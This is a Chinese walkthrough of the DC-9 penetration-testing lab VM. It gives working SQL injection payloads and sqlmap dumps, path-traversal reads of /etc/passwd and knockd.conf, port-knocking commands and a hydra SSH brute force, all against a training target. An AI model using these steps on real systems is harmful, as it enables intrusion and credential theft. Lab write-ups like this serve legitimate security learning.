首页 > 其他分享 >DC-9渗透学习

DC-9渗透学习

时间:2024-02-01 11:44:40浏览次数:23  
标签:INFO 100.22 20 渗透 DC 192.168 学习 2019 root

开靶机,net模式,启动

arp-scan -l命令扫描存活主机

image

nmap -sS -sV -A -n 192.168.100.22

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:21 EST
Nmap scan report for 192.168.100.22
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:21:69:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.78 ms 192.168.100.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

我这里使用无糖的软件直接扫
image

指纹扫一下80端口

image
image

kali访问一下

image
发现点击dispaly后会显示一些类似数据库中的信息
image
同样看一下search和manage
image
image

尝试在search页面进行sql注入,发现有回显

1' or 1=1 #
image

使用sqlmap尝试爆破

爆库

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -dbs  
        ___
       __H__                                                                                            
 ___ ___["]_____ ___ ___  {1.7.12.9#dev}                                                                
|_ -| . [.]     | .'| . |                                                                               
|___|_  [']_|_|_|__,|  _|                                                                               
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:25:47 /2024-01-31/

[20:25:47] [INFO] testing connection to the target URL
[20:25:47] [INFO] testing if the target URL content is stable
[20:25:48] [INFO] target URL content is stable
[20:25:48] [INFO] testing if POST parameter 'search' is dynamic
[20:25:48] [WARNING] POST parameter 'search' does not appear to be dynamic
[20:25:48] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[20:25:48] [INFO] testing for SQL injection on POST parameter 'search'
[20:25:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:25:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:25:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                                            
[20:25:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:25:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:25:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:25:48] [INFO] testing 'Generic inline queries'
[20:25:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:25:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:25:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:25:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:26:08] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable                                                                                         
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:26:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:26:18] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:26:18] [INFO] target URL appears to be UNION injectable with 6 columns
[20:26:18] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:26:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:26:26] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[20:26:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:26:26 /2024-01-31/

爆表

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D users -tables
        ___
       __H__                                                                                            
 ___ ___[']_____ ___ ___  {1.7.12.9#dev}                                                                
|_ -| . [']     | .'| . |                                                                               
|___|_  [,]_|_|_|__,|  _|                                                                               
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:27:18 /2024-01-31/

[20:27:19] [INFO] resuming back-end DBMS 'mysql' 
[20:27:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:27:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:27:19] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

[20:27:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:27:19 /2024-01-31/

爆数据

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D users -T UserDetails -dump
        ___
       __H__                                                                                            
 ___ ___[']_____ ___ ___  {1.7.12.9#dev}                                                                
|_ -| . ["]     | .'| . |                                                                               
|___|_  [.]_|_|_|__,|  _|                                                                               
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:28:35 /2024-01-31/

[20:28:35] [INFO] resuming back-end DBMS 'mysql' 
[20:28:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:28:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:28:35] [INFO] fetching columns for table 'UserDetails' in database 'users'
[20:28:35] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

[20:28:35] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/users/UserDetails.csv'                                                                     
[20:28:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:28:35 /2024-01-31/

员工的账号密码
再把另一个表Staff爆一下

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -tables
        ___
       __H__                                                                                            
 ___ ___[']_____ ___ ___  {1.7.12.9#dev}                                                                
|_ -| . [(]     | .'| . |                                                                               
|___|_  [)]_|_|_|__,|  _|                                                                               
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:30:50 /2024-01-31/

[20:30:50] [INFO] resuming back-end DBMS 'mysql' 
[20:30:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:30:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:30:50] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

[20:30:50] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:30:50 /2024-01-31/

爆第一张表StaffDetails

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -T StaffDetails -dump 
        ___
       __H__                                                                                            
 ___ ___["]_____ ___ ___  {1.7.12.9#dev}                                                                
|_ -| . [)]     | .'| . |                                                                               
|___|_  [)]_|_|_|__,|  _|                                                                               
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:32:02 /2024-01-31/

[20:32:02] [INFO] resuming back-end DBMS 'mysql' 
[20:32:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:32:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:32:02] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[20:32:02] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email                 | phone          | lastname   | reg_date            | firstname | position                      |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1  | [email protected]     | 46478415155456 | Moe        | 2019-05-01 17:32:00 | Mary      | CEO                           |
| 2  | [email protected]    | 46457131654    | Dooley     | 2019-05-01 17:32:00 | Julie     | Human Resources               |
| 3  | [email protected]     | 46415323       | Flintstone | 2019-05-01 17:32:00 | Fred      | Systems Administrator         |
| 4  | [email protected]   | 324643564      | Rubble     | 2019-05-01 17:32:00 | Barney    | Help Desk                     |
| 5  | [email protected]      | 802438797      | Cat        | 2019-05-01 17:32:00 | Tom       | Driver                        |
| 6  | [email protected]    | 24342654756    | Mouse      | 2019-05-01 17:32:00 | Jerry     | Stores                        |
| 7  | [email protected]    | 243457487      | Flintstone | 2019-05-01 17:32:00 | Wilma     | Accounts                      |
| 8  | [email protected]    | 90239724378    | Rubble     | 2019-05-01 17:32:00 | Betty     | Junior Accounts               |
| 9  | [email protected] | 189024789      | Bing       | 2019-05-01 17:32:00 | Chandler  | President - Sales             |
| 10 | [email protected]     | 232131654      | Tribbiani  | 2019-05-01 17:32:00 | Joey      | Janitor                       |
| 11 | [email protected]   | 823897243978   | Green      | 2019-05-01 17:32:00 | Rachel    | Personal Assistant            |
| 12 | [email protected]     | 6549638203     | Geller     | 2019-05-01 17:32:00 | Ross      | Instructor                    |
| 13 | [email protected]   | 8092432798     | Geller     | 2019-05-01 17:32:00 | Monica    | Marketing                     |
| 14 | [email protected]   | 43289079824    | Buffay     | 2019-05-01 17:32:02 | Phoebe    | Assistant Janitor             |
| 15 | [email protected]    | 454786464      | McScoots   | 2019-05-01 20:16:33 | Scooter   | Resident Cat                  |
| 16 | [email protected]   | 65464646479741 | Trump      | 2019-12-23 03:11:39 | Donald    | Replacement Janitor           |
| 17 | [email protected]  | 47836546413    | Morrison   | 2019-12-24 03:41:04 | Scott     | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+

[20:32:02] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/Staff/StaffDetails.csv'                                                                   
[20:32:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:32:02 /2024-01-31/

爆第二张表Users

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -T Users -dump       
        ___
       __H__                                                                                            
 ___ ___[,]_____ ___ ___  {1.7.12.9#dev}                                                                
|_ -| . [,]     | .'| . |                                                                               
|___|_  [,]_|_|_|__,|  _|                                                                               
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:33:02 /2024-01-31/

[20:33:03] [INFO] resuming back-end DBMS 'mysql' 
[20:33:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:33:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:33:03] [INFO] fetching columns for table 'Users' in database 'Staff'
[20:33:03] [INFO] fetching entries for table 'Users' in database 'Staff'
[20:33:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:33:10] [INFO] writing hashes to a temporary file '/tmp/sqlmap4b1ullqp35516/sqlmaphashes-b6219vj2.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:33:15] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[20:33:23] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:33:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:33:26] [INFO] starting 4 processes 
[20:33:35] [INFO] using suffix '1'                                                                     
[20:33:40] [INFO] cracked password 'transorbital1' for user 'admin'                                    
Database: Staff                                                                                        
Table: Users
[1 entry]
+--------+--------------------------------------------------+----------+
| UserID | Password                                         | Username |
+--------+--------------------------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |
+--------+--------------------------------------------------+----------+

[20:33:44] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/Staff/Users.csv'                                                                                 
[20:33:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:33:44 /2024-01-31/

爆出admin和密码,盲猜md5,密码sqlmap自动解密好了

admin
transorbital1

尝试登录后台
成功
image
看到多了一个选项
应该是一个添加用户的界面,看见下面有一个file does not exist,猜测有文件包含漏洞,之前只做过几道ctf,了解不是很深,好在这里不难

文件包含

image

**前置条件:
4.8.0 <= phpMyAdmin < 4.8.2

访问`http://x.x.x.x:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`,可见`/etc/passwd`被读取,说明文件包含漏洞存在

那尝试下呗

http://192.168.100.22/addrecord.php?file=../../../../etc/passwd

image

File does not exist
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash 

丢给chat

这是一个Unix-like系统中的/etc/passwd文件的内容,其中包含了用户账户的信息。每一行都代表一个用户账户,提供了用户名、用户ID(UID)、组ID(GID)、主目录以及默认shell等详细信息。

以下是一些示例用户:

用户名 root,用户ID 0,组ID 0,主目录 /root,默认shell /bin/bash。
用户名 marym,用户ID 1001,组ID 1001,主目录 /home/marym,默认shell /bin/bash。
用户名 julied,用户ID 1002,组ID 1002,主目录 /home/julied,默认shell /bin/bash。
用户名 fredf,用户ID 1003,组ID 1003,主目录 /home/fredf,默认shell /bin/bash。
用户名 barneyr,用户ID 1004,组ID 1004,主目录 /home/barneyr,默认shell /bin/bash。
如果您有具体的问题或需要进行特定操作,请告诉我,我将尽力协助。

新内容:

端口保护之端口敲门

knockd服务:即敲门端口服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,,使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性,它的默认配置文件是:/etc/knockd.conf
依次对其进行敲门,然后就可以开启ssh服务进行连接了,所以我们可以通过文件包含来显示该配置文件的内容
image

File does not exist
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command =
/sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn 
[closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D
INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn 

老规矩,chat

你提供了一个与使用iptables管理SSH访问的配置片段。这个配置定义了基于指定TCP标志序列的打开和关闭SSH访问的命令。

让我来解释一下提供的信息:

1. **UseSyslog [openSSH]:**
   - `sequence = 7469,8475,9842`:指定了一个TCP标志序列。
   - `seq_timeout = 25`:为序列设置了超时值。
   - `command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT`:当检测到指定序列时执行的命令。它添加了一个规则,允许来自指定IP地址的端口22的TCP流量。

2. **[closeSSH]:**
   - `sequence = 9842,8475,7469`:这是关闭序列,与打开序列的顺序相反。
   - `seq_timeout = 25`:类似于打开序列,设置了超时值。
   - `command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT`:执行此命令以删除规则,并拒绝来自指定IP地址的端口22的TCP流量。

3. `tcpflags = syn`:两个配置都指定了基于SYN标志的序列,SYN标志通常用于TCP三次握手。

需要注意的是,`%IP%` 占位符似乎用于表示触发序列的IP地址。在运行时,此占位符可能被实际的IP地址替换。

在部署到生产环境之前,请在受控环境中测试此配置。此外,考虑使用这种方法打开和关闭SSH访问的安全性影响。

对7469,8475,9842进行挨个敲门

nmap -p 7469 192.168.100.22
nmap -p 8475 192.168.100.22
nmap -p 9842 192.168.100.22
或者
nc 192.168.100.22 7469
nc 192.168.100.22 8475
nc 192.168.100.22 9842

┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 7469        
(UNKNOWN) [192.168.100.22] 7469 (?) : Connection refused
                                                                                                        
┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 8475
(UNKNOWN) [192.168.100.22] 8475 (?) : Connection refused
                                                                                                        
┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 9842
(UNKNOWN) [192.168.100.22] 9842 (?) : Connection refused
                                                                                                        
┌──(root㉿kali)-[~]
└─# nmap -p 22 192.168.100.22       
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:08 EST
Nmap scan report for 192.168.100.22
Host is up (0.00014s latency).

PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 00:0C:29:21:69:DF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

可以看到22端口开放了

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:23 EST
Nmap scan report for 192.168.100.22
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:21:69:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.78 ms 192.168.100.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds

将UserDetails中的用户名密码写入txt
image
image

使用海德拉进行爆破

参数名 参数含义
-l 指定破解的用户,对特定用户破解
-L 指定用户名字典
-p 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典
-R 继续从上一次进度接着破解
-S 大写,采用SSL链接
-s 小写,可通过这个参数指定非默认端口
-e 可选选项,n:空密码试探,s:使用指定用户和密码试探
-t 同时运行的线程数,默认为16
-C 使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数
-M 指定目标列表文件一行一条
-o 指定结果输出文件
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-w 设置最大超时的时间,单位秒,默认是30s
-v / -V 显示详细过程
server 目标ip
service 指定服务名,支持的服务和协议

┌──(root㉿kali)-[~/Desktop]
└─# hydra -L users.txt -P pass.txt 192.168.100.22 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-31 21:38:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.100.22:22/
[22][ssh] host: 192.168.100.22   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.100.22   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.100.22   login: janitor   password: Ilovepeepee
[STATUS] 285.00 tries/min, 285 tries in 00:01h, 7 to do in 00:01h, 13 active
1 of 1 target successfully completed, 3 valid passwords found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-31 21:39:19

得到三个账号密码
image

分别进行ssh登录查看

断开命令:logout

chandlerb
image
